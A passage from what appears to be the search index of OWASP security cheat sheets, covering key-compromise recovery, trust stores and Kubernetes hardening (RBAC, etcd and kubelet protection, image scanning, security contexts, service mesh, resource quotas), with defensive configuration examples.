  5. Employing key confirmation (see NIST SP 800-57 Part 1 Section 4.2.5.5) to help ensure that the proper key was, in fact, established.
  6. Establishing an accountability system that keeps track of each access to symmetric and private keys in plaintext form.
  7. Providing a cryptographic integrity check on the key (e.g., using a MAC or a digital signature).
  8. The use of trusted timestamps for signed data.
  9. Destroying keys as soon as they are no longer needed.
  10. Creating a compromise-recovery plan, especially in the case of a CA compromise.

A compromise-recovery plan is essential for restoring cryptographic security services in the event of a key compromise. A compromise-recovery plan shall be documented and easily accessible.

The compromise-recovery plan should contain:

  1. The identification and contact info of the personnel to notify.
  2. The identification and contact info of the personnel to perform the recovery actions.
  3. The re-key method.
  4. An inventory of all cryptographic keys and their use (e.g., the location of all certificates in a system).
  5. The education of all appropriate personnel on the recovery procedures.
  6. The identification and contact info of all personnel needed to support the recovery procedures.
  7. Policies requiring that key-revocation checking be enforced (to minimize the effect of a compromise).
  8. The monitoring of the re-keying operations (to ensure that all required operations are performed for all affected keys).
  9. Any other recovery procedures, which may include:
    1. Physical inspection of the equipment.
    2. Identification of all information that may be compromised as a result of the incident.
    3. Identification of all signatures that may be invalid, due to the compromise of a signing key.
    4. Distribution of new keying material, if required.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#trust-stores","title":"Trust Stores","text":"
  1. Design controls to secure the trust store against injection of third-party root certificates. The access controls are managed and enforced on an entity and application basis.
  2. Implement integrity controls on objects stored in the trust store.
  3. Do not allow for export of keys held within the trust store without authentication and authorization.
  4. Set up strict policies and procedures for exporting key material from applications to network applications and other components.
  5. Implement a secure process for updating the trust store.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-key-management-libraries","title":"Cryptographic Key Management Libraries","text":"

Use only reputable crypto libraries that are well maintained and updated, as well as tested and validated by third-party organizations (e.g., NIST/FIPS).

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#documentation","title":"Documentation","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html","title":"Kubernetes Security Cheat Sheet","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes","title":"Kubernetes","text":"

Kubernetes is an open source container orchestration engine for automating deployment, scaling, and management of containerized applications. The open source project is hosted by the Cloud Native Computing Foundation (CNCF).

When you deploy Kubernetes, you get a cluster. A Kubernetes cluster consists of a set of worker machines, called nodes, that run containerized applications. The control plane manages the worker nodes and the Pods in the cluster.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-plane-components","title":"Control Plane Components","text":"

The control plane's components make global decisions about the cluster, as well as detecting and responding to cluster events. It consists of components such as kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager.

  1. kube-apiserver: exposes the Kubernetes API. The API server is the front end for the Kubernetes control plane.
  2. etcd: a consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data.
  3. kube-scheduler: watches for newly created Pods with no assigned node, and selects a node for them to run on.
  4. kube-controller-manager: runs controller processes. Logically, each controller is a separate process, but to reduce complexity, they are all compiled into a single binary and run in a single process.
  5. cloud-controller-manager: lets you link your cluster into your cloud provider's API, and separates out the components that interact with that cloud platform from components that just interact with your cluster.
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-components","title":"Node Components","text":"

Node components run on every node, maintaining running pods and providing the Kubernetes runtime environment. It consists of components such as kubelet, kube-proxy and container runtime.

  1. kubelet: an agent that runs on each node in the cluster. It makes sure that containers are running in a Pod.
  2. kube-proxy: a network proxy that runs on each node in your cluster, implementing part of the Kubernetes Service concept.
  3. Container runtime: the software that is responsible for running containers.

This cheatsheet provides a starting point for securing a Kubernetes cluster. It is divided into the following categories:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-hosts","title":"Securing Kubernetes hosts","text":"

There are several options available to deploy Kubernetes: on bare metal, on-premises, and in the public cloud (either a custom Kubernetes build on virtual machines or a managed service). Kubernetes was designed to be highly portable and customers can easily switch between these installations, migrating their workloads.

All of this potential customisation of Kubernetes means it can be designed to fit a large variety of scenarios; however, this is also its greatest weakness when it comes to security. Kubernetes is designed out of the box to be customizable and users must turn on certain functionality to secure their cluster. This means that the engineers responsible for deploying the Kubernetes platform need to know about all the potential attack vectors and vulnerabilities poor configuration can lead to.

It is recommended to harden the underlying hosts by installing the latest version of the operating system, hardening the operating system, implementing the necessary patch management and configuration management systems, implementing essential firewall rules, and undertaking specific security measures depending on the datacenter environment.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-version","title":"Kubernetes Version","text":"

It has become impossible to track all potential attack vectors. This is unfortunate, as there is nothing more vital than being aware of and on top of potential threats. The best defense is to make sure that you are running the latest available version of Kubernetes.

The Kubernetes project maintains release branches for the most recent three minor releases and it backports the applicable fixes, including security fixes, to those three release branches, depending on severity and feasibility. Patch releases are cut from those branches at a regular cadence, plus additional urgent releases, when required. Hence it is always recommended to upgrade the Kubernetes cluster to the latest available stable version. It is recommended to refer to the version skew policy for further details https://kubernetes.io/docs/setup/release/version-skew-policy/.

There are several techniques such as rolling updates, and node pool migrations that allow you to complete an update with minimal disruption and downtime.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-components","title":"Securing Kubernetes components","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-network-access-to-sensitive-ports","title":"Control network access to sensitive ports","text":"

Kubernetes clusters usually listen on a range of well-defined and distinctive ports which makes it easier to identify the clusters and attack them. Hence it is highly recommended to configure authentication and authorization on the cluster and cluster nodes.

Here is an overview of the default ports used in Kubernetes. Make sure that your network blocks access to these ports, and consider limiting access to the Kubernetes API server to trusted networks only.

Master node(s):

  1. TCP 6443: Kubernetes API Server
  2. TCP 2379-2380: etcd server client API
  3. TCP 10250: Kubelet API
  4. TCP 10251: kube-scheduler
  5. TCP 10252: kube-controller-manager
  6. TCP 10255: Read-Only Kubelet API

Worker nodes:

  1. TCP 10250: Kubelet API
  2. TCP 10255: Read-Only Kubelet API
  3. TCP 30000-32767: NodePort Services
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limit-direct-access-to-kubernetes-nodes","title":"Limit Direct Access to Kubernetes Nodes","text":"

You should limit SSH access to Kubernetes nodes, reducing the risk of unauthorized access to host resources. Instead you should ask users to use \"kubectl exec\", which will provide direct access to the container environment without the ability to access the host.

You can use Kubernetes Authorization Plugins to further control user access to resources. This allows defining fine-grained access control rules for specific namespaces, containers and operations.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubernetes-api","title":"Controlling access to the Kubernetes API","text":"

The Kubernetes platform is controlled using API requests and as such is the first line of defense against attackers. Controlling who has access and what actions they are allowed to perform is the primary concern. For more information, refer to the documentation at https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-transport-layer-security","title":"Use Transport Layer Security","text":"

Communication in the cluster between services should be handled using TLS, encrypting all traffic by default. This, however, is often overlooked with the thought being that the cluster is secure and there is no need to provide encryption in transit within the cluster.

Advances in network technology, such as the service mesh, have led to the creation of products like LinkerD and Istio which can enable TLS by default while providing extra telemetry information on transactions between services.

Kubernetes expects that all API communication in the cluster is encrypted by default with TLS, and the majority of installation methods will allow the necessary certificates to be created and distributed to the cluster components. Note that some components and installation methods may enable local ports over HTTP and administrators should familiarize themselves with the settings of each component to identify potentially unsecured traffic.

To learn more on usage of TLS in Kubernetes cluster, refer to the documentation at https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/#1-tls-everywhere.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authentication","title":"API Authentication","text":"

Kubernetes provides a number of in-built mechanisms for API server authentication; however, these are likely only suitable for non-production or small clusters.

The recommended approach for larger or production clusters is to use an external authentication method.

In addition to choosing the appropriate authentication system, API access should be considered privileged and use Multi-Factor Authentication (MFA) for all user access.

For more information, consult Kubernetes authentication reference document at https://kubernetes.io/docs/reference/access-authn-authz/authentication

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authorization-implement-role-based-access-control","title":"API Authorization - Implement role-based access control","text":"

In Kubernetes, you must be authenticated (logged in) before your request can be authorized (granted permission to access). Kubernetes expects attributes that are common to REST API requests. This means that Kubernetes authorization works with existing organization-wide or cloud-provider-wide access control systems which may handle other APIs besides the Kubernetes API.

Kubernetes authorizes API requests using the API server. It evaluates all of the request attributes against all policies and allows or denies the request. All parts of an API request must be allowed by some policy in order to proceed. This means that permissions are denied by default.

Role-based access control (RBAC) is a method of regulating access to computer or network resources based on the roles of individual users within your organization.

Kubernetes ships an integrated Role-Based Access Control (RBAC) component that matches an incoming user or group to a set of permissions bundled into roles. These permissions combine verbs (get, create, delete) with resources (pods, services, nodes) and can be namespace or cluster scoped. A set of out of the box roles are provided that offer reasonable default separation of responsibility depending on what actions a client might want to perform. It is recommended that you use the Node and RBAC authorizers together, in combination with the NodeRestriction admission plugin.

RBAC authorization uses the rbac.authorization.k8s.io API group to drive authorization decisions, allowing you to dynamically configure policies through the Kubernetes API. To enable RBAC, start the API server with the --authorization-mode flag set to a comma-separated list that includes RBAC; for example:

kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options\n
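
Once RBAC is enabled, permissions are granted through Role/ClusterRole objects and bound to users, groups or service accounts with RoleBinding/ClusterRoleBinding objects. As a minimal illustrative sketch (the namespace, role and user names are placeholders), a namespaced Role granting read-only access to pods, bound to a single user, might look like:

apiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  namespace: default\n  name: pod-reader\nrules:\n- apiGroups: [\"\"]\n  resources: [\"pods\"]\n  verbs: [\"get\", \"watch\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: read-pods\n  namespace: default\nsubjects:\n- kind: User\n  name: jane\n  apiGroup: rbac.authorization.k8s.io\nroleRef:\n  kind: Role\n  name: pod-reader\n  apiGroup: rbac.authorization.k8s.io\n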

For detailed examples of utilizing RBAC, refer to Kubernetes documentation at https://kubernetes.io/docs/reference/access-authn-authz/rbac

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#restrict-access-to-etcd","title":"Restrict access to etcd","text":"

etcd is a critical Kubernetes component which stores information on state and secrets, and it should be protected differently from the rest of your cluster. Write access to the API server's etcd is equivalent to gaining root on the entire cluster, and even read access can be used to escalate privileges fairly easily.

The Kubernetes scheduler will search etcd for pod definitions that do not have a node. It then sends the pods it finds to an available kubelet for scheduling. Validation for submitted pods is performed by the API server before it writes them to etcd, so malicious users writing directly to etcd can bypass many security mechanisms - e.g. PodSecurityPolicies.

Administrators should always use strong credentials from the API servers to their etcd server, such as mutual auth via TLS client certificates, and it is often recommended to isolate the etcd servers behind a firewall that only the API servers may access.
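
As an illustrative sketch only (certificate paths and addresses are placeholders), mutual TLS between the API server and etcd is typically configured with flags along these lines:

etcd --client-cert-auth --trusted-ca-file=/etc/etcd/ca.crt --cert-file=/etc/etcd/server.crt --key-file=/etc/etcd/server.key --other-options\nkube-apiserver --etcd-servers=https://127.0.0.1:2379 --etcd-cafile=/etc/etcd/ca.crt --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key --other-options\n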

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#caution","title":"Caution","text":"

Allowing other components within the cluster to access the master etcd instance with read or write access to the full keyspace is equivalent to granting cluster-admin access. Using separate etcd instances for non-master components or using etcd ACLs to restrict read and write access to a subset of the keyspace is strongly recommended.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubelet","title":"Controlling access to the Kubelet","text":"

Kubelets expose HTTPS endpoints which grant powerful control over the node and containers. By default Kubelets allow unauthenticated access to this API. Production clusters should enable Kubelet authentication and authorization.
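
As an illustrative sketch (the certificate path is a placeholder), disabling anonymous access, delegating authorization to the API server and closing the read-only port are typically done with kubelet flags such as:

kubelet --anonymous-auth=false --authorization-mode=Webhook --client-ca-file=/etc/kubernetes/pki/ca.crt --read-only-port=0 --other-options\n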

For more information, refer to Kubelet authentication/authorization documentation at https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-dashboard","title":"Securing Kubernetes Dashboard","text":"

The Kubernetes dashboard is a webapp for managing your cluster. It is not a part of the Kubernetes cluster itself, it has to be installed by the owners of the cluster. Thus, there are a lot of tutorials on how to do this. Unfortunately, most of them create a service account with very high privileges. This caused Tesla and some others to be hacked via such a poorly configured K8s dashboard. (Reference: Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/)

To prevent attacks via the dashboard, you should follow some tips:
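
For example, one commonly recommended tip is to avoid exposing the dashboard externally and to reach it through kubectl proxy instead. The sketch below assumes the dashboard is deployed in the kubernetes-dashboard namespace; the exact proxy URL may differ between dashboard versions:

kubectl proxy\n# The dashboard is then reachable only from the local machine, e.g.:\n# http://localhost:8001/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/\n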

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-build-phase","title":"Kubernetes Security Best Practices: Build Phase","text":"

Securing containers and Kubernetes starts in the build phase with securing your container images. The two main things to do here are to build secure images and to scan those images for any known vulnerabilities.

A Container image is an immutable, lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings [https://www.docker.com/resources/what-container]. The image shares the kernel of the operating system present in its host machine.

Container images must be built using approved and secure base images that are scanned and monitored at regular intervals to ensure only secure and authentic images can be used within the cluster. It is recommended to configure strong governance policies regarding how images are built and stored in trusted image registries.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#ensure-that-only-authorized-images-are-used-in-your-environment","title":"Ensure That Only Authorized Images are used in Your Environment","text":"

Without a process that ensures that only images adhering to the organization\u2019s policy are allowed to run, the organization is open to risk of running vulnerable or even malicious containers. Downloading and running images from unknown sources is dangerous. It is equivalent to running software from an unknown vendor on a production server. Don\u2019t do that.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-registry-and-the-use-of-an-image-scanner-to-identify-known-vulnerabilities","title":"Container registry and the use of an image scanner to identify known vulnerabilities","text":"

A container registry is the central repository of container images. Based on your needs, you can utilize public repositories or a private repository as the container registry. Use private registries to store your approved images - make sure you only push approved images to these registries. This alone reduces the number of potential images that enter your pipeline to a fraction of the hundreds of thousands of publicly available images.

Build a CI pipeline that integrates security assessment (like vulnerability scanning), making it part of the build process. The CI pipeline should ensure that only vetted code (approved for production) is used for building the images. Once an image is built, it should be scanned for security vulnerabilities, and only if no issues are found should the image be pushed to the private registry from which deployment to production is done. A failure in the security assessment should fail the pipeline, preventing images with poor security quality from being pushed to the image registry.

Many source code repositories provide scanning capabilities (e.g. GitHub, GitLab), and many CI tools offer integration with open source vulnerability scanners such as Trivy or Grype.
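
For instance, a CI step can fail the build when high or critical findings are reported. An illustrative Trivy invocation (the image reference is a placeholder) might be:

trivy image --exit-code 1 --severity HIGH,CRITICAL registry.example.com/myapp:1.0.0\n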

Work is in progress in Kubernetes on image authorization plugins, which will make it possible to prevent unauthorized images from being shipped. For more information, refer to the PR https://github.com/kubernetes/kubernetes/pull/27129.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-minimal-base-images-and-avoid-adding-unnecessary-components","title":"Use minimal base images and avoid adding unnecessary components","text":"

Avoid using images with OS package managers or shells because they could contain unknown vulnerabilities. If you must include OS packages, remove the package manager at a later step. Consider using minimal images such as distroless images, as an example.

Restricting what's in your runtime container to precisely what's necessary for your app is a best practice employed by Google and other tech giants that have used containers in production for many years. It improves the signal-to-noise ratio of scanners (e.g. CVE scanners) and reduces the burden of establishing provenance to just what you need.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#distroless-images","title":"Distroless images","text":"

Distroless images contain fewer packages compared to other images, and do not include a shell, which reduces the attack surface.

For more information on distroless images, refer to https://github.com/GoogleContainerTools/distroless.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#scratch-image","title":"Scratch image","text":"

An empty image, ideal for statically compiled languages like Go. Because the image is empty, the attack surface is truly minimal - only your code!

For more information, refer to https://hub.docker.com/_/scratch

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-the-latest-imagesensure-images-are-up-to-date","title":"Use the latest images/ensure images are up to date","text":"

Ensure your images (and any third-party tools you include) are up to date and utilizing the latest versions of their components.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-deploy-phase","title":"Kubernetes Security Best Practices: Deploy Phase","text":"

Kubernetes infrastructure should be configured securely prior to workloads being deployed. From a security perspective, you first need visibility into what you\u2019re deploying \u2013 and how. Then you can identify and respond to security policy violations. At a minimum, you need to know:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-namespaces-to-properly-isolate-your-kubernetes-resources","title":"Use Kubernetes namespaces to properly isolate your Kubernetes resources","text":"

Namespaces give you the ability to create logical partitions and enforce separation of your resources as well as limit the scope of user permissions.
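
As a minimal illustrative example (the namespace name is a placeholder), a namespace is itself just another Kubernetes object:

apiVersion: v1\nkind: Namespace\nmetadata:\n  name: team-a\n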

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-for-a-request","title":"Setting the namespace for a request","text":"

To set the namespace for a current request, use the --namespace flag. Refer to the following examples:

kubectl run nginx --image=nginx --namespace=<insert-namespace-name-here>\nkubectl get pods --namespace=<insert-namespace-name-here>\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-preference","title":"Setting the namespace preference","text":"

You can permanently save the namespace for all subsequent kubectl commands in that context.

kubectl config set-context --current --namespace=<insert-namespace-name-here>\n

Validate it with the following command.

kubectl config view --minify | grep namespace:\n

Learn more about namespaces at https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#create-policies-to-govern-image-provenance-using-the-imagepolicywebhook","title":"Create policies to govern image provenance using the ImagePolicyWebhook","text":"

Use the ImagePolicyWebhook admission controller to prevent unapproved images from being used and to reject pods that use such images (see the illustrative configuration below).
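
The webhook is enabled on the API server (--enable-admission-plugins=ImagePolicyWebhook together with --admission-control-config-file) and configured through an AdmissionConfiguration file. The following is an illustrative sketch only; the kubeconfig path is a placeholder and the backend that evaluates the image policy must be provided separately:

apiVersion: apiserver.config.k8s.io/v1\nkind: AdmissionConfiguration\nplugins:\n- name: ImagePolicyWebhook\n  configuration:\n    imagePolicy:\n      kubeConfigFile: /etc/kubernetes/image-policy/kubeconfig.yaml\n      allowTTL: 50\n      denyTTL: 50\n      retryBackoff: 500\n      defaultAllow: false\n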

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-continuous-security-vulnerability-scanning","title":"Implement Continuous Security Vulnerability Scanning","text":"

New vulnerabilities are published every day and containers might include outdated packages with recently-disclosed vulnerabilities (CVEs). A strong security posture will include regular production scanning, covering first-party containers (applications you have built and previously scanned) and third-party containers (sourced from trusted repositories and vendors).

Open Source projects such as ThreatMapper can assist in identifying and prioritizing vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#regularly-apply-security-updates-to-your-environment","title":"Regularly Apply Security Updates to Your Environment","text":"

In case vulnerabilities are found in running containers, it is recommended to always update the source image and redeploy the containers.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#note","title":"NOTE","text":"

Try to avoid direct updates to the running containers as this can break the image-container relationship.

Example: apt-get update\n

Upgrading containers is extremely easy with the Kubernetes rolling updates feature - this allows gradually updating a running application by upgrading its images to the latest version.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#assess-the-privileges-used-by-containers","title":"Assess the privileges used by containers","text":"

The set of capabilities, role bindings, and privileges given to containers can greatly impact your security risk. The goal here is to adhere to the principle of least privilege and provide the minimum privileges and capabilities that would allow the container to perform its intended function.

Pod Security Policies are one way to control the security-related attributes of pods, including container privilege levels. These can allow an operator to specify the following:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#apply-security-context-to-your-pods-and-containers","title":"Apply Security Context to Your Pods and Containers","text":"

A security context is a property defined in the deployment yaml. It controls the security parameters that will be assigned to the pod/container/volume. These controls can eliminate entire classes of attacks that depend on privileged access. Read-only root file systems, for example, can prevent any attack that depends on installing software or writing to the file system.

When designing your containers and pods, make sure that you configure the security context for your pods, containers and volumes to grant only the privileges needed for the resource to function. Some of the important parameters are as follows:

  1. SecurityContext->runAsNonRoot: indicates that containers should run as a non-root user.
  2. SecurityContext->Capabilities: controls the Linux capabilities assigned to the container.
  3. SecurityContext->readOnlyRootFilesystem: controls whether a container will be able to write into the root filesystem.
  4. PodSecurityContext->runAsNonRoot: prevents running a container with the 'root' user as part of the pod.

Here is an example for pod definition with security context parameters:

apiVersion: v1\nkind: Pod\nmetadata:\n  name: hello-world\nspec:\n  containers:\n  # specification of the pod\u2019s containers\n  - name: hello-world-container\n    # ...\n    # Security Context\n    securityContext:\n      readOnlyRootFilesystem: true\n      runAsNonRoot: true\n

For more information on security context for Pods, refer to the documentation at https://kubernetes.io/docs/tasks/configure-pod-container/security-context

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-service-mesh","title":"Implement Service Mesh","text":"

A service mesh is an infrastructure layer for microservices applications that can help reduce the complexity of managing microservices and deployments by handling infrastructure service communication quickly, securely and reliably. Service meshes are great at solving operational challenges and issues when running containers and microservices because they provide a uniform way to secure, connect and monitor microservices. Service mesh provides the following advantages:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#observability","title":"Observability","text":"

Service Mesh provides tracing and telemetry metrics that make it easy to understand your system and quickly root cause any problems.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#security","title":"Security","text":"

A service mesh provides security features aimed at securing the services inside your network and quickly identifying any compromising traffic entering your cluster. A service mesh can help you more easily manage security through mTLS, ingress and egress control, and more.

Securing microservices is hard. There are a multitude of tools that address microservices security, but service mesh is the most elegant solution for addressing encryption of on-the-wire traffic within the network.

Service mesh provides defense with mutual TLS (mTLS) encryption of the traffic between your services. The mesh can automatically encrypt and decrypt requests and responses, removing that burden from the application developer. It can also improve performance by prioritizing the reuse of existing, persistent connections, reducing the need for the computationally expensive creation of new ones. With service mesh, you can secure traffic over the wire and also make strong identity-based authentication and authorizations for each microservice.
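
As an illustrative sketch, assuming Istio is the mesh in use, strict mutual TLS can be required mesh-wide with a PeerAuthentication resource such as:

apiVersion: security.istio.io/v1beta1\nkind: PeerAuthentication\nmetadata:\n  name: default\n  namespace: istio-system\nspec:\n  mtls:\n    mode: STRICT\n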

We see a lot of value in this for enterprise companies. With a good service mesh, you can see whether mTLS is enabled and working between each of your services and get immediate alerts if security status changes.

Service mesh adds a layer of security that allows you to monitor and address compromising traffic as it enters the mesh. Istio integrates with Kubernetes as an ingress controller and takes care of load balancing for ingress. This allows you to add a level of security at the perimeter with ingress rules. Egress control allows you to see and manage external services and control how your services interact with them.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#operational-control","title":"Operational Control","text":"

A service mesh allows security and platform teams to set the right macro controls to enforce access controls, while allowing developers to make customizations they need to move quickly within these guardrails.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rbac","title":"RBAC","text":"

A strong Role Based Access Control (RBAC) system is arguably one of the most critical requirements in large engineering organizations, since even the most secure system can be easily circumvented by overprivileged users or employees. Restricting privileged users to the least privileges necessary to perform their job responsibilities, ensuring access to systems is set to \u201cdeny all\u201d by default, and ensuring proper documentation detailing roles and responsibilities is in place are among the most critical security concerns in the enterprise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

Along with the many advantages, a service mesh also brings its own set of challenges; a few of them are listed below:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implementing-centralized-policy-management","title":"Implementing centralized policy management","text":"

There are numerous projects which are able to provide centralized policy management for a Kubernetes cluster, most predominantly the Open Policy Agent (OPA) project, Kyverno, or Validating Admission Policy (a built-in, yet alpha (aka off by default) feature as of 1.26). In order to provide some depth, we will focus on OPA for the remainder of this cheat sheet.

OPA is a project that started in 2016 aimed at unifying policy enforcement across different technologies and systems. It can be used to enforce policies on platforms like Kubernetes clusters. When it comes to Kubernetes, RBAC and Pod Security Policies can be used to impose fine-grained control over the cluster, but they only apply within the cluster, not outside it. That\u2019s where Open Policy Agent (OPA) comes into play. OPA was introduced to create a unified method of enforcing security policy in the stack.

OPA is a general-purpose, domain-agnostic policy enforcement tool. It can be integrated with APIs, the Linux SSH daemon, an object store like CEPH, etc. OPA designers purposefully avoided basing it on any other project. Accordingly, the policy query and decision do not follow a specific format. That is, you can use any valid JSON data as request attributes as long as it provides the required data. Similarly, the policy decision coming from OPA can also be any valid JSON data. You choose what gets input and what gets output. For example, you can opt to have OPA return a True or False JSON object, a number, a string, or even a complex data object. Currently, OPA is part of CNCF as an incubating project.

Most common use cases of OPA:

OPA enables you to accelerate time to market by providing pre-cooked authorization technology so you don\u2019t have to develop it from scratch. It uses a declarative policy language purpose built for writing and enforcing rules such as, \u201cAlice can write to this repository,\u201d or \u201cBob can update this account.\u201d It comes with a rich suite of tooling to help developers integrate those policies into their applications and even allow the application\u2019s end users to contribute policy for their tenants as well.

If you have homegrown application authorization solutions in place, you may not want to rip them out to swap in OPA. At least not yet. But if you are going to be decomposing those monolithic apps and moving to microservices to scale and improve developer efficiency, you\u2019re going to need a distributed authorization system and OPA (or one of the related competitors) could be the answer.

Kubernetes has given developers tremendous control over the traditional silos of compute, networking and storage. Developers today can set up the network the way they want and set up storage the way they want. Administrators and security teams responsible for the well-being of a given container cluster need to make sure developers don\u2019t shoot themselves (or their neighbors) in the foot.

OPA can be used to build policies that require, for example, all container images to be from trusted sources, that prevent developers from running software as root, that make sure storage is always marked with the encrypt bit, that ensure storage does not get deleted just because a pod gets restarted, that limit internet access, etc.

OPA integrates directly into the Kubernetes API server, so it has complete authority to reject any resource\u2014whether compute, networking, storage, etc.\u2014that policy says doesn\u2019t belong in a cluster. Moreover, you can expose those policies earlier in the development lifecycle (e.g. the CICD pipeline or even on developer laptops) so that developers can receive feedback as early as possible. You can even run policies out-of-band to monitor results so that administrators can ensure policy changes don\u2019t inadvertently do more damage than good.

And finally, many organizations are using OPA to regulate use of service mesh architectures. So, even if you're not embedding OPA to implement application authorization logic (the top use case discussed above), you probably still want control over the APIs your microservices expose and consume. You can achieve that by putting authorization policies into the service mesh. Or, you may be motivated by security and implement policies in the service mesh to limit lateral movement within a microservice architecture. Another common practice is to build policies into the service mesh to ensure your compliance regulations are satisfied even when modifications to source code are involved.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limiting-resource-usage-on-a-cluster","title":"Limiting resource usage on a cluster","text":"

Resource quota limits the number or capacity of resources granted to a namespace. This is most often used to limit the amount of CPU, memory, or persistent disk a namespace can allocate, but can also control how many pods, services, or volumes exist in each namespace.

Limit ranges restrict the maximum or minimum size of some of the resources above, to prevent users from requesting unreasonably high or low values for commonly reserved resources like memory, or to provide default limits when none are specified.
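
As a minimal sketch (the resource names and values here are illustrative, not prescriptive), a LimitRange that sets default requests/limits and an upper bound for containers in a namespace might look like this:

apiVersion: v1\nkind: LimitRange\nmetadata:\n  name: default-limits\nspec:\n  limits:\n  - type: Container\n    # Applied when a container specifies no limits/requests of its own\n    default:\n      cpu: 500m\n      memory: 256Mi\n    defaultRequest:\n      cpu: 250m\n      memory: 128Mi\n    # Upper bound a single container may request\n    max:\n      cpu: \"1\"\n      memory: 512Mi\n

It is applied to a namespace in the same way as the resource quota shown below.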

Running resource-unbound containers puts your system at risk of DoS or \u201cnoisy neighbor\u201d scenarios. To prevent or minimize those risks, you should define resource quotas. By default, all resources in a Kubernetes cluster are created with unbounded CPU and memory requests/limits. You can create resource quota policies, attached to a Kubernetes namespace, in order to limit the CPU and memory a pod is allowed to consume.

The following is an example of a namespace resource quota definition that limits the number of pods in the namespace to 4, total CPU requests to 1 and CPU limits to 2, and total memory requests to 1GB and memory limits to 2GB.

compute-resources.yaml:

apiVersion: v1\nkind: ResourceQuota\nmetadata:\n  name: compute-resources\nspec:\n  hard:\n    pods: \"4\"\n    requests.cpu: \"1\"\n    requests.memory: 1Gi\n    limits.cpu: \"2\"\n    limits.memory: 2Gi\n

Assign a resource quota to namespace:

kubectl create -f ./compute-resources.yaml --namespace=myspace\n

For more information on configuring resource quotas, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/policy/resource-quotas/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-network-policies-to-control-traffic-between-pods-and-clusters","title":"Use Kubernetes network policies to control traffic between pods and clusters","text":"

Running different applications on the same Kubernetes cluster creates a risk of one compromised application attacking a neighboring application. Network segmentation is important to ensure that containers can communicate only with those they are supposed to.

